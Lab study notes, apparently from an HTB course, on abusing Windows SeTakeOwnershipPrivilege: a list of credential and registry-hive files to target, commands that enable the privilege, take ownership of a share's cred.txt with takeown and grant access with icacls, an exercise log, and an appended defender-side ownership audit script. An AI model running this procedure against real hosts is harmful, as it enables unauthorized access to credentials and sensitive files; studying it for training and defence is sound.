# Intro

- [SeTakeOwnershipPrivilege](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/take-ownership-of-files-or-other-objects) grants a user the ability to take ownership of any "securable object," meaning AD objects, NTFS files/folders, printers, registry keys, services, and processes
- This privilege assigns [WRITE_OWNER](https://docs.microsoft.com/en-us/windows/win32/secauthz/standard-access-rights) rights over an object, meaning the user can change the owner within the object's security descriptor
- Admins are assigned this privilege by default
- While a standard user account rarely has this priv, we may encounter a service account that, for example, is tasked with running backup jobs and VSS snapshots with this priv
- A service account with `SeTakeOwnership` may also be assigned a few others such as `SeBackup`, `SeRestore`, and `SeSecurity` to control this account's privs at a more granular level without full local admin rights
- NOTE: These privs on their own could likely be used to privesc
- With the `SeTakeOwnership` priv, a user could take ownership of any file or object and make changes that could involve access to sensitive data, RCE, or DoS
- As an example, suppose we encounter a user with the `SeTakeOwnership` priv or assign it to them through an attack such as GPO abuse using [SharpGPOAbuse](https://github.com/FSecureLABS/SharpGPOAbuse)
- Continuing with this example, we could use the `SeTakeOwnership` priv to potentially take control of a shared folder or sensitive files such as a document containing passwords or an SSH key

# Files of Interest

```cmd
c:\inetpub\wwwroot\web.config
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software
%WINDIR%\repair\security
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
```

- Others include `.kdbx` KeePass database files, OneNote notebooks, files such as `passwords.*`, `pass.*`, `creds.*`, scripts, other configuration files, virtual hard drive files, and more

# Leveraging `SeTakeOwnershipPrivilege`

## Enable `SeTakeOwnershipPrivilege`

- First, review the current user's privs

```powershell
whoami /priv
```

- Next, if the `SeTakeOwnership` priv is disabled, use this [script](https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1) to enable the priv

```powershell
Import-Module .\Enable-Privilege.ps1
.\EnableAllTokenPrivs.ps1
whoami /priv
```

## Choose a Target File

- Next, choose a target file and confirm the current ownership
- For this example, we'll target an interesting file found on a file share
- Note: It is common to encounter file shares with `Public` and `Private` directories with subdirectories set up by department
- Given a user's role in the company, they can often access specific files/directories

```powershell
Get-ChildItem -Path 'C:\Department Shares\Private\IT\cred.txt' | Select Fullname,LastWriteTime,Attributes,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }}
```

## Check Target File's Perms

- `dir /q` shows the owner of each entry in the directory

```powershell
cmd /c dir /q 'C:\Department Shares\Private\IT'
```

## Take Ownership of Target File

- Below we leverage the [takeown](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/takeown) Windows binary to change file ownership

```powershell
takeown /f 'C:\Department Shares\Private\IT\cred.txt'
```

## Confirm Ownership Change

```powershell
Get-ChildItem -Path 'C:\Department Shares\Private\IT\cred.txt' | select name,directory, @{Name="Owner";Expression={(Get-ACL $_.Fullname).Owner}}
```

## Modify Target File's ACL

- If we still cannot read the file, modify the file ACL using `icacls` to be able to read it

```powershell
cat 'C:\Department Shares\Private\IT\cred.txt'
icacls 'C:\Department Shares\Private\IT\cred.txt' /grant htb-student:F
```

## Reading the Target File

```powershell
cat 'C:\Department Shares\Private\IT\cred.txt'
```

---

# Exercise

- `ping` test
![[images/Pasted image 20260218210033.png]]
- same target as previous section so no need to perform an `nmap` scan
- `rdp` into target with given creds
- initial enum on target
![[images/Pasted image 20260218210252.png]]
    - `SeTakeOwnership` is currently disabled
- find target file
![[images/Pasted image 20260218210333.png]]
- enable the `SeTakeOwnership` priv
    - first move `enable-privilege.ps1` to target
    - next, upgrade to a powershell session, import the module, and execute
    - confirmed that the priv is now enabled
![[images/Pasted image 20260218211206.png]]
- enum target file
    - `C:\Department Shares\Private\IT\cred.txt`
![[images/Pasted image 20260218211247.png]]
- take ownership of target file and confirm
![[images/Pasted image 20260218211345.png]]
- try to read target file > denied
![[images/Pasted image 20260218211417.png]]
- modify ACL for the target file, then read > BOOM!
![[images/Pasted image 20260218211455.png]]
- do same for `c:\takeown\flag.txt`
![[images/Pasted image 20260218211835.png]]
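As an added example that is not part of these notes or of the HTB module they follow, the PowerShell audit below turns the "Leveraging" procedure around to the defender's side: it lists which principals hold `SeTakeOwnershipPrivilege` on a host and reports the current owner of the files of interest, flagging any owner outside the expected set. It assumes an elevated session (`secedit` needs admin) and treats `C:\Department Shares\Private\IT\cred.txt` as the placeholder share path from the notes.

```powershell
# Added example (not from these notes or the HTB module): a defender-side audit that lists
# which principals hold SeTakeOwnershipPrivilege on this host and reports the current owner
# of the sensitive paths above, flagging any owner outside the expected set.
# Assumptions: elevated PowerShell (secedit needs admin); the share path is the placeholder
# from the notes and is skipped if it does not exist.
$Paths = @(
    "$env:SystemDrive\inetpub\wwwroot\web.config",
    "$env:WINDIR\repair\sam", "$env:WINDIR\repair\system",
    "$env:WINDIR\repair\software", "$env:WINDIR\repair\security",
    "$env:WINDIR\system32\config\SecEvent.Evt",
    "$env:WINDIR\system32\config\default.sav", "$env:WINDIR\system32\config\security.sav",
    "$env:WINDIR\system32\config\software.sav", "$env:WINDIR\system32\config\system.sav",
    'C:\Department Shares\Private\IT\cred.txt'   # placeholder path from the notes
)

function Get-TakeOwnershipHolders {
    # secedit exports the local policy as UTF-16; [Privilege Rights] contains a line such as
    # SeTakeOwnershipPrivilege = *S-1-5-32-544  (comma-separated SIDs prefixed with '*')
    $cfg = Join-Path $env:TEMP 'secpol-export.inf'
    secedit /export /cfg $cfg /areas USER_RIGHTS | Out-Null
    $line = Get-Content $cfg -Encoding Unicode | Where-Object { $_ -match '^SeTakeOwnershipPrivilege\s*=' }
    Remove-Item $cfg -ErrorAction SilentlyContinue
    if (-not $line) { return @() }
    ($line -split '=', 2)[1] -split ',' | ForEach-Object {
        $sid = $_.Trim().TrimStart('*')
        try {   # translate SID to account name; keep the raw SID if it no longer resolves
            $id = New-Object System.Security.Principal.SecurityIdentifier $sid
            $id.Translate([System.Security.Principal.NTAccount]).Value
        } catch { $sid }
    }
}

function Get-OwnerReport {
    param([string[]] $Path,
          [string[]] $ExpectedOwner = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
                                        'NT SERVICE\TrustedInstaller'))
    foreach ($p in $Path) {
        if (-not (Test-Path -LiteralPath $p)) { continue }
        $owner = (Get-Acl -LiteralPath $p).Owner
        # Unexpected = $true is the signal: a principal outside the expected set now owns the file
        [pscustomobject]@{ Path = $p; Owner = $owner; Unexpected = ($ExpectedOwner -notcontains $owner) }
    }
}

'Principals holding SeTakeOwnershipPrivilege:'
Get-TakeOwnershipHolders | ForEach-Object { "  $_" }
Get-OwnerReport -Path $Paths | Format-Table -AutoSize
```

A `takeown`/`icacls` sequence like the one above also leaves a trail in the Security log when the Sensitive Privilege Use and File System audit subcategories are enabled, so the owner report is best paired with that logging rather than run on its own.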